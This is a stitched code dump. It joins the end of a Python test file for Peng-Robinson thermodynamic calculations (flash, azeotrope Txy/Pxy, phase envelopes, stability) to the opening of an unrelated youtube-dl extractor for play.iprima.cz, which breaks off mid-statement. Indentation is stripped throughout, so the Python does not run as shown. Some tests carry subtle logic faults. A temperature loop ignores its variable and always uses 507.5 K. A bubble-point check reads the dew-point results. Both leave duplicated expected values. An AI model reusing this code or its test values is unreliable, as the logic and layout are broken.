assert_allclose(S1 - S2, -50.38050604000216, atol=1)
# High pressure temperature change and phase change
pkg.flash(T=300, P=3e6, zs=m.zs)
assert pkg.phase == 'l'
S1 = pkg.Sm
pkg.flash(T=400, P=1e5, zs=m.zs)
assert pkg.phase == 'g'
S2 = pkg.Sm
S1 - S2
assert_allclose(S1 - S2, -124.39457107124854, atol=1)
@pytest.mark.deprecated
def test_PRMIX_pkg_extras():
# TODO add more properties as they are added
zs = [0.4, 0.6]
m = Mixture(['Ethane', 'Heptane'], zs=zs, T=300, P=1E6)
kij = .0
kijs = [[0,kij],[kij,0]]
Tcs = [305.322, 540.13]
Pcs = [4872200.0, 2736000.0]
omegas = [0.099, 0.349]
pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs,
Tcs=Tcs, Pcs=Pcs, omegas=omegas,
kijs=kijs, eos_kwargs=None,
HeatCapacityGases=m.HeatCapacityGases)
pkg.flash(T=400, P=1e5, zs=m.zs)
assert 'g' == pkg.phase
assert_allclose(pkg.eos_g.H_dep_g, -179.77096245871508, rtol=1e-5)
assert_allclose(pkg.eos_g.S_dep_g, -0.2971318950892263, rtol=1e-5)
assert_allclose(pkg.Hgm_dep, -179.77096245871508, rtol=5e-5)
assert_allclose(pkg.Sgm_dep, -0.2971318950892263, rtol=5e-5)
assert_allclose(pkg.Cpgm, 153.32126587681677, rtol=1e-3)
assert_allclose(pkg.Cvgm, 144.3920626710827, rtol=1e-3) # :)
assert_allclose(pkg.Cpgm_dep, 0.7139646058820279, rtol=1e-5)
assert_allclose(pkg.Cvgm_dep, 0.09922120014794993, rtol=1e-5) #? maybe issue
pkg.flash(T=300, P=1e7, zs=m.zs)
assert 'l' == pkg.phase
assert_allclose(pkg.eos_l.H_dep_l, -25490.54123032457, rtol=5e-5)
assert_allclose(pkg.eos_l.S_dep_l, -48.47646403887194, rtol=5e-5)
assert_allclose(pkg.Hlm_dep, -25490.54123, rtol=1e-4)
assert_allclose(pkg.Slm_dep, -48.47646403887194, rtol=1e-4)
assert_allclose(pkg.Cplm, 160.5756363050434, rtol=1e-3)
assert_allclose(pkg.Cvlm, 133.7943922248561, rtol=1e-3) # :)
assert_allclose(pkg.Cplm_dep, 39.8813153015303, rtol=5e-5)
assert_allclose(pkg.Cvlm_dep, 21.414531021342995, rtol=5e-5) #? maybe issue
@pytest.mark.deprecated
def test_azeotrope_Txy_PR():
IDs = ['ethanol', 'benzene']
pkg = PropertyPackageConstants(IDs, name=PR_PKG)
pkg.pkg.kijs = [[0.0, .0728], [0.0728, 0]]
# Test the pressure in the test
_, _, Tbubbles, Tdews = pkg.pkg.plot_Txy(P=101325., pts=30, values=True)
Tbubbles_expect = [353.1524424999673, 351.21711105215405, 349.63220641849136, 348.3290291072549, 347.2552443556649, 346.37022614955663, 345.6419123814478, 345.0446351984003, 344.55759626315887, 344.16377920005266, 343.84916614883053, 343.60217197943285, 343.41323969870245, 343.2745605540422, 343.1798963139651, 343.12449170081203, 343.1050736632354, 343.1199423771055, 343.169167658216, 343.2549149821879, 343.38193882073034, 343.5582990521058, 343.7963805186986, 344.1143278723936, 344.53804741377195, 345.1039685436253, 345.8627772097754, 346.88426937346605, 348.26317130456636, 350.12491594342015]
Tdews_expect = [353.1524424945457, 352.3912913474467, 351.6262944570331, 350.8588218276585, 350.0906535909099, 349.32409993796796, 348.56216098024134, 347.8087416697709, 347.0689431804551, 346.349459873305, 345.6591224986107, 345.00963438553083, 344.4165436003679, 343.90042076441017, 343.4879384830795, 343.21166686886806, 343.10538604291753, 343.1904450269102, 343.4583142995908, 343.8715382698287, 344.38531268086734, 344.96341038590646, 345.5807576414249, 346.22080282099756, 346.8726671468842, 347.52913516661, 348.18536889289476, 348.83809921197854, 349.4851121234294, 350.1249159362295]
assert_allclose(Tbubbles, Tbubbles_expect, rtol=5e-5)
assert_allclose(Tdews, Tdews_expect, rtol=5e-5)
@pytest.mark.deprecated
def test_azeotrope_Txy_PR_multiP():
IDs = ['ethanol', 'benzene']
pkg = PropertyPackageConstants(IDs, name=PR_PKG)
pkg.pkg.kijs = [[0.0, .0728], [0.0728, 0]]
#Test some more pressures for good measure (do not go too far near the boundaries)
Tdews_vary_P_expect = [[220.15284322119734, 219.96736090890047, 222.4531025319982, 225.87591713961928, 228.38731541934482, 230.38394741856035, 232.04763019651986, 233.47741573028978, 234.73343380218137, 235.85502051831918, 236.8693632699694, 237.79606282049812, 238.6497311937851, 239.441561771029, 240.18032475929877], [250.29484272442642, 249.8077093695365, 249.42498602603337, 249.28679137901344, 251.96383913156598, 254.37995372490553, 256.413822517376, 258.1732216294687, 259.72617151880036, 261.1180840150342, 262.38075082537034, 263.53729905772974, 264.6050861496727, 265.5974792849115, 266.5249972102388], [291.6640151659878, 290.7705630707953, 289.9138195863271, 289.1364722089608, 288.52440010361823, 288.2911650820978, 289.2699169291151, 291.1074635611929, 292.88383384665804, 294.5345675748379, 296.06323507541447, 297.48280466114016, 298.8066120886574, 300.0464992568524, 301.2125736864664], [352.7187334210476, 351.14318764286776, 349.5582311684951, 347.9830060760723, 346.4505096140636, 345.01844631869784, 343.78971773705734, 342.946979856768, 342.761997697104, 343.3571699367641, 344.44973552643745, 345.7436125329223, 347.09887074851576, 348.456160479165, 349.78950974944104], [452.0244773102955, 448.93347954186527, 445.80843092367013, 442.6587093618919, 439.501298156353, 436.36519982883647, 433.2983005305142, 430.3773519002321, 427.7197877701338, 425.488417876116, 423.8636548918616, 422.9595322281223, 422.7424527930051, 423.0631573964071, 423.755679832123]]
Tbubbles_vary_P_expect = [[220.15284322260558, 219.9593754659149, 219.97616818101181, 220.06166994291502, 220.11857644484724, 220.07120074079083, 219.85507103807385, 219.41277280716295, 218.69492646979015, 217.668864547681, 216.34458685271593, 214.85030366123252, 213.69173078234607, 215.05360231675624, 240.18032476043962], [250.29484272636603, 249.6034873812954, 249.3302912913737, 249.28015720321142, 249.32976951168072, 249.39258345431227, 249.40319499276376, 249.31112373153306, 249.08166823900348, 248.70647278451116, 248.234802114006, 247.86101246500266, 248.19942715491368, 251.37880207972458, 266.5249972119777], [291.6640151695664, 289.98349864091705, 289.03830617940577, 288.5439451223825, 288.32964841249037, 288.2845537334007, 288.33357406890497, 288.4270830783461, 288.5394805139744, 288.6772197151695, 288.90297364622535, 289.39555977182874, 290.6007278361622, 293.62911489553994, 301.2125736895028], [352.71873342667294, 349.111737745725, 346.7112146623439, 345.1062784039534, 344.0464541688307, 343.37007653346484, 342.96929893428904, 342.772655513814, 342.7375808864912, 342.85043503480443, 343.1348957652109, 343.67328993658566, 344.6514600873893, 346.44748552216527, 349.78950975665305], [452.0244773382353, 444.9894726934088, 439.5814848561124, 435.3968758569498, 432.1385100677904, 429.5895584761499, 427.5915768205421, 426.02882099085946, 424.8179436451578, 423.90205997868895, 423.2487129719721, 422.85201924536585, 422.7401871273592, 422.99064457143066, 423.7556798321766]]
Tdews_vary_P = []
Tbubbles_vary_P = []
# pkg.pkg.plot_Txy(P=100, pts=100) # values=True
for P in logspace(2, 6, 5):
_, _, Tbubbles, Tdews = pkg.pkg.plot_Txy(P=P, pts=15, values=True)
Tbubbles_vary_P.append(Tbubbles)
Tdews_vary_P.append(Tdews)
assert_allclose(Tbubbles_vary_P, Tbubbles_vary_P_expect, rtol=1e-5)
assert_allclose(Tdews_vary_P, Tdews_vary_P_expect, rtol=1e-5)
@pytest.mark.deprecated
def test_azeotrope_Pxy_PR_multiT():
IDs = ['ethanol', 'benzene']
pkg = PropertyPackageConstants(IDs, name=PR_PKG)
pkg.pkg.kijs = [[0.0, .0728], [0.0728, 0]]
Ts = [220, 250, 300, 350, 400, 450, 475, 450, 500, 505, 507.5]
Ps_bubble_multi_T_expect = [[2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672]]
Ps_dew_multi_T_expect = [[2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671]]
Ps_bubble_multi_T, Ps_dew_multi_T = [], []
for T in Ts:
_, _, Ps_bubble, Ps_dew = pkg.pkg.plot_Pxy(T=507.5, pts=20, ignore_errors=True, values=True)
Ps_bubble_multi_T.append(Ps_bubble)
Ps_dew_multi_T.append(Ps_dew)
assert_allclose(Ps_bubble_multi_T_expect, Ps_bubble_multi_T, rtol=1e-6)
assert_allclose(Ps_dew_multi_T_expect, Ps_dew_multi_T, rtol=1e-6)
@pytest.mark.deprecated
def test_phase_envelope_ethane_pentane():
IDs = ['ethane', 'n-pentane']
pkg = PropertyPackageConstants(IDs, PR_PKG, kijs=[[0, 7.609447e-003], [7.609447e-003, 0]])
zs = [0.7058334393128614, 0.2941665606871387] # 50/50 mass basis
max_step_damping = 100
P_high = 8e6
factor = 1.2
min_step_termination = 1000
min_factor_termination = 1.001
pkg.pkg.FLASH_VF_TOL = 1e-8
max_P_step = 1e5
P_low = 1e5
spec_points = linspace(1e5, 6.8e6, 68)
P_points, Ts_known, xs_known = pkg.pkg.dew_T_envelope(zs, P_low=P_low, P_high=P_high, xtol=1E-10,
factor=factor, min_step_termination=min_step_termination,
min_factor_termination=min_factor_termination,
max_step_damping=max_step_damping,
max_P_step=max_P_step,
spec_points=spec_points)
P_points2, Ts_known2, ys_known = pkg.pkg.bubble_T_envelope(zs, P_low=P_low, P_high=P_high, xtol=1E-10,
factor=factor, min_step_termination=min_step_termination,
max_step_damping=max_step_damping,
min_factor_termination=min_factor_termination,
max_P_step=max_P_step, spec_points=spec_points)
Ps_dew_check = []
Ts_dew_check = []
Ts_dew_expect = [277.1449361694948, 293.9890986702753, 304.8763147090649, 313.1006603531763, 319.7750626828419, 325.42150966613895, 330.32990856864086, 334.6791912532372, 338.58812791519466, 342.13987634031974, 345.3950895854326, 348.39946023112896, 351.1883247302556, 353.7896091573966, 356.22578835719867, 358.51523195418594, 360.673155009561, 362.71230559820697, 364.64347249145516, 366.47586686424677, 368.21741391309746, 369.8749788315006, 371.4545441481416, 372.96135047685806, 374.40000935978657, 375.774594553273, 377.0887164639959, 378.3455832681606, 379.54805139424366, 380.698667422777, 381.7997029894565, 382.8531839253168, 383.8609145986068, 384.824498212078, 385.74535365141924, 386.6247293397855, 387.4637144549204, 388.2632477701861, 389.02412430395054, 389.7469998909282, 390.4323937166012, 391.08068879770735, 391.69213029960156, 392.2668215113749, 392.8047171889375, 393.30561384008115, 393.76913637985547, 394.19472032380185, 394.58158839582626, 394.9287200011976, 395.2348113354687, 395.4982230372662, 395.71691081859336, 395.8883324260842, 396.0093207511565, 396.0759073750358, 396.0830711573792, 396.024369487178, 395.8913790901176, 395.67280294095485, 395.3529926936849, 394.9092730479461, 394.3067055020046, 393.48636807223045, 392.33342385249546, 390.55261457054587]
for P_dew, T_dew in zip(P_points, Ts_known):
if abs(P_dew % 1e5) < 1e-5:
Ps_dew_check.append(P_dew)
Ts_dew_check.append(T_dew)
Ps_bubble_check = []
Ts_bubble_check = []
Ts_bubble_expect = [277.1449361694948, 293.9890986702753, 304.8763147090649, 313.1006603531763, 319.7750626828419, 325.42150966613895, 330.32990856864086, 334.6791912532372, 338.58812791519466, 342.13987634031974, 345.3950895854326, 348.39946023112896, 351.1883247302556, 353.7896091573966, 356.22578835719867, 358.51523195418594, 360.673155009561, 362.71230559820697, 364.64347249145516, 366.47586686424677, 368.21741391309746, 369.8749788315006, 371.4545441481416, 372.96135047685806, 374.40000935978657, 375.774594553273, 377.0887164639959, 378.3455832681606, 379.54805139424366, 380.698667422777, 381.7997029894565, 382.8531839253168, 383.8609145986068, 384.824498212078, 385.74535365141924, 386.6247293397855, 387.4637144549204, 388.2632477701861, 389.02412430395054, 389.7469998909282, 390.4323937166012, 391.08068879770735, 391.69213029960156, 392.2668215113749, 392.8047171889375, 393.30561384008115, 393.76913637985547, 394.19472032380185, 394.58158839582626, 394.9287200011976, 395.2348113354687, 395.4982230372662, 395.71691081859336, 395.8883324260842, 396.0093207511565, 396.0759073750358, 396.0830711573792, 396.024369487178, 395.8913790901176, 395.67280294095485, 395.3529926936849, 394.9092730479461, 394.3067055020046, 393.48636807223045, 392.33342385249546, 390.55261457054587]
for P_bubble, T_bubble in zip(P_points, Ts_known):
if abs(P_bubble % 1e5) < 1e-5:
Ps_bubble_check.append(P_bubble)
Ts_bubble_check.append(T_bubble)
assert_allclose(Ps_bubble_check, spec_points[:-2])
assert_allclose(Ps_dew_check, spec_points[:-2])
assert_allclose(Ts_dew_check, Ts_dew_expect, rtol=1e-5)
assert_allclose(Ts_bubble_check, Ts_bubble_expect, rtol=1e-5)
@pytest.mark.deprecated
def test_ethane_pentane_TP_Tdew_Tbubble_TP():
# Takes 9 seconds!
IDs = ['ethane', 'n-pentane']
pkg = PropertyPackageConstants(IDs, PR_PKG, kijs=[[0, 7.609447e-003], [7.609447e-003, 0]])
zs = [0.7058334393128614, 0.2941665606871387] # 50/50 mass basis
pkg = pkg.pkg
VFs = []
all_Ts = []
all_Ps = []
P_high = 6.1e6 # goal: 6e6 It worked!
P_low = 1e3
Ps = logspace(log10(P_low), log10(P_high), 50)
T_lows = []
T_highs = []
for P in Ps:
pkg.flash(P=P, VF=0, zs=zs)
T_low = pkg.T # 129 K
T_lows.append(T_low)
pkg.flash(P=P, VF=1, zs=zs)
T_high = pkg.T # 203 K
T_highs.append(T_high)
for Wilson_first in (False, True):
VFs_working = []
Ts = linspace(T_low+1e-4, T_high-1e-4, 50)
for T in Ts:
ans = pkg.flash_TP_zs(P=P, T=T, zs=zs, Wilson_first=Wilson_first)
VFs_working.append(ans[-1])
if ans[0] != 'l/g':
raise ValueError("Converged to single phase solution at T=%g K, P=%g Pa" %(T, P))
VFs.append(VFs_working)
all_Ts.append(Ts)
all_Ps.append(Ps)
@pytest.mark.deprecated
@pytest.mark.slow_envelope
def test_phase_envelope_44_components():
IDs = ['nitrogen', 'carbon dioxide', 'H2S', 'methane', 'ethane', 'propane', 'isobutane', 'butane', 'isopentane', 'pentane', 'Hexane', 'Heptane', 'Octane', 'Nonane', 'Decane', 'Undecane', 'Dodecane', 'Tridecane', 'Tetradecane', 'Pentadecane', 'Hexadecane', 'Heptadecane', 'Octadecane', 'Nonadecane', 'Eicosane', 'Heneicosane', 'Docosane', 'Tricosane', 'Tetracosane', 'Pentacosane', 'Hexacosane', 'Heptacosane', 'Octacosane', 'Nonacosane', 'Triacontane', 'Benzene', 'Toluene', 'Ethylbenzene', 'Xylene', '1,2,4-Trimethylbenzene', 'Cyclopentane', 'Methylcyclopentane', 'Cyclohexane', 'Methylcyclohexane']
zs = [9.11975115499676e-05, 9.986813065240533e-05, 0.0010137795304828892, 0.019875879000370657, 0.013528874875432457, 0.021392773691700402, 0.00845450438914824, 0.02500218071904368, 0.016114189201071587, 0.027825798446635016, 0.05583179467176313, 0.0703116540769539, 0.07830577180555454, 0.07236459223729574, 0.0774523322851419, 0.057755091407705975, 0.04030134965162674, 0.03967043780553758, 0.03514481759005302, 0.03175471055284055, 0.025411123554079325, 0.029291866298718154, 0.012084986551713202, 0.01641114551124426, 0.01572454598093482, 0.012145363820829673, 0.01103585282423499, 0.010654818322680342, 0.008777712911254239, 0.008732073853067238, 0.007445155260036595, 0.006402875549212365, 0.0052908087849774296, 0.0048199150683177075, 0.015943943854195963, 0.004452253754752775, 0.01711981267072777, 0.0024032720444511282, 0.032178399403544646, 0.0018219517069058137, 0.003403378548794345, 0.01127516775495176, 0.015133143423489698, 0.029483213283483682]
pkg = PropertyPackageConstants(IDs, PR_PKG)
max_step_damping = 50
P_low = 1e4
factor = 1.2
min_step_termination = 1000
min_factor_termination = 1.0002
pkg.pkg.FLASH_VF_TOL = 1e-8
P_high = 2e8
spec_points = linspace(1e5, 4e6, 40)
P_points, Ts_known, xs_known = pkg.pkg.dew_T_envelope(zs, P_low=P_low, P_high=P_high, xtol=1E-10,
factor=factor, min_step_termination=min_step_termination,
min_factor_termination=min_factor_termination,
max_step_damping=max_step_damping,
spec_points=spec_points
)
P_points2, Ts_known2, ys_known = pkg.pkg.bubble_T_envelope(zs, P_low=P_low, P_high=P_high, xtol=1E-10,
factor=factor, min_step_termination=min_step_termination,
max_step_damping=max_step_damping,
min_factor_termination=min_factor_termination,
spec_points=spec_points
)
Ps_dew_check = []
Ts_dew_check = []
Ts_dew_expect = [585.1745093521665, 609.5133715138915, 624.6944734390993, 635.7991119723131, 644.5334850169733, 651.6941060581852, 657.7213913216676, 662.8858558611348, 667.3660286752593, 671.2860034847065, 674.7354375617153, 677.7810270676093, 680.4734809440047, 682.8519536806468, 684.9469622199979, 686.7823540873131, 688.3766543470003, 689.7439863506575, 690.8946833742955, 691.8356590318011, 692.5705695910872, 693.0997717010517, 693.4200465117376, 693.5240144469666, 693.399082494406, 693.0255964253895, 692.3734715991103, 691.3954910689196, 690.0119359589117, 688.0668235519908, 685.1543692400655, 679.0864243340858]
for P_dew, T_dew in zip(P_points, Ts_known):
if abs(P_dew % 1e5) < 1e-5:
Ps_dew_check.append(P_dew)
Ts_dew_check.append(T_dew)
Ps_bubble_check = []
Ts_bubble_check = []
Ts_bubble_expect = [585.1745093521665, 609.5133715138915, 624.6944734390993, 635.7991119723131, 644.5334850169733, 651.6941060581852, 657.7213913216676, 662.8858558611348, 667.3660286752593, 671.2860034847065, 674.7354375617153, 677.7810270676093, 680.4734809440047, 682.8519536806468, 684.9469622199979, 686.7823540873131, 688.3766543470003, 689.7439863506575, 690.8946833742955, 691.8356590318011, 692.5705695910872, 693.0997717010517, 693.4200465117376, 693.5240144469666, 693.399082494406, 693.0255964253895, 692.3734715991103, 691.3954910689196, 690.0119359589117, 688.0668235519908, 685.1543692400655, 679.0864243340858]
for P_bubble, T_bubble in zip(P_points, Ts_known):
if abs(P_bubble % 1e5) < 1e-5:
Ps_bubble_check.append(P_bubble)
Ts_bubble_check.append(T_bubble)
assert_allclose(Ps_bubble_check, spec_points[:-8])
assert_allclose(Ps_dew_check, spec_points[:-8])
assert_allclose(Ts_dew_check, Ts_dew_expect, rtol=1e-5)
assert_allclose(Ts_bubble_check, Ts_bubble_expect, rtol=1e-5)
@pytest.mark.deprecated
def test_TPD_bubble_dew():
IDs = ['ethane', 'n-pentane']
pkg = PropertyPackageConstants(IDs, PR_PKG, kijs=[[0, 7.609447e-003], [7.609447e-003, 0]])
zs = [0.7058334393128614, 0.2941665606871387] # 50/50 mass basis
pkg = pkg.pkg
pkg.flash(P=1e6, VF=0, zs=zs)
pkg.eos_l.fugacities()
pkg.eos_g.fugacities()
TPD_calc = TPD(pkg.eos_g.T, pkg.eos_l.zs, pkg.eos_l.lnphis_l, pkg.eos_g.zs, pkg.eos_g.lnphis_g,)
assert_allclose(TPD_calc, 0, atol=1e-6)
pkg.flash(T=200, VF=0, zs=zs)
pkg.eos_l.fugacities()
pkg.eos_g.fugacities()
TPD_calc = TPD(pkg.eos_g.T, pkg.eos_l.zs, pkg.eos_l.lnphis_l, pkg.eos_g.zs, pkg.eos_g.lnphis_g,)
assert_allclose(TPD_calc, 0, atol=1e-6)
pkg.flash(P=1e6, VF=1, zs=zs)
pkg.eos_l.fugacities()
pkg.eos_g.fugacities()
TPD_calc = TPD(pkg.eos_g.T, pkg.eos_g.zs, pkg.eos_g.lnphis_g, pkg.eos_l.zs, pkg.eos_l.lnphis_l)
assert_allclose(TPD_calc, 0, atol=1e-6)
pkg.flash(T=300, VF=1, zs=zs)
pkg.eos_l.fugacities()
pkg.eos_g.fugacities()
TPD_calc = TPD(pkg.eos_g.T, pkg.eos_g.zs, pkg.eos_g.lnphis_g, pkg.eos_l.zs, pkg.eos_l.lnphis_l)
assert_allclose(TPD_calc, 0, atol=1e-6)
@pytest.mark.deprecated
def test_stab_comb_products_need_both_roots():
comb_IDs = ['N2', 'CO2', 'O2', 'H2O']
comb_zs = [0.5939849621247668,
0.112781954982051,
0.0676691730155464,
0.2255639098776358]
pkg2 = PropertyPackageConstants(comb_IDs, PR_PKG)
kijs = [[0.0, -0.0122, -0.0159, 0.0], [-0.0122, 0.0, 0.0, 0.0952], [-0.0159, 0.0, 0.0, 0.0], [0.0, 0.0952, 0.0, 0.0]]
pkg2 = PropertyPackageConstants(comb_IDs, PR_PKG, kijs=kijs)
pkg2.pkg.flash_caloric(P=1e5,T=794.5305048838037, zs=comb_zs)
assert 'g' == pkg2.pkg.phase |
Dineshs91/youtube-dl | refs/heads/master | youtube_dl/extractor/iprima.py | 96 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
from random import random
from math import floor
from .common import InfoExtractor
from ..compat import (
compat_urllib_request,
)
from ..utils import (
ExtractorError,
remove_end,
)
class IPrimaIE(InfoExtractor):
_VALID_URL = r'https?://play\.iprima\.cz/(?:[^/]+/)*(?P<id>[^?#]+)'
_TESTS = [{
'url': 'http://play.iprima.cz/particka/particka-92',
'info_dict': {
'id': '39152',
'ext': 'flv',
'title': 'Partička (92)',
'description': 'md5:74e9617e51bca67c3ecfb2c6f9766f45',
'thumbnail': 'http://play.iprima.cz/sites/default/files/image_crops/image_620x349/3/491483_particka-92_image_620x349.jpg',
},
'params': {
'skip_download': True, # requires rtmpdump
},
}, {
'url': 'http://play.iprima.cz/particka/tchibo-particka-jarni-moda',
'info_dict': {
'id': '9718337',
'ext': 'flv',
'title': 'Tchibo Partička - Jarní móda',
'thumbnail': 're:^http:.*\.jpg$',
},
'params': {
'skip_download': True, # requires rtmpdump
},
}, {
'url': 'http://play.iprima.cz/zpravy-ftv-prima-2752015',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
webpage = self._download_webpage(url, video_id)
if re.search(r'Nemáte oprávnění přistupovat na tuto stránku\.\s*</div>', webpage):
raise ExtractorError(
'%s said: You do not have permission to access this page' % self.IE_NAME, expected=True)
player_url = (
